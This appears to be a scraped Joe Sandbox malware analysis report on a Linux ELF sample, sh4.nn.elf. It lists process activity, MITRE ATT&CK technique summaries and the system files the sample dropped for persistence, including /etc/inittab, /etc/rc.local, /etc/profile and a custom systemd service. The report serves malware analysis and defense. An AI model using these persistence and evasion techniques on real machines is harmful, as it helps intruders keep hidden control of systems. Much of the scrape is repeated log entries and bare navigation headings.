Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:21:39
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:21:39
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:21:39
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report sh4.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh4.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.L0CwJZ (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: dash PID: 6225, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6225, Parent PID: 4331

General

Chronological Activities

Analysis Process: dash PID: 6226, Parent PID: 4331

General

Chronological Activities

Linux Analysis Report
sh4.nn.elf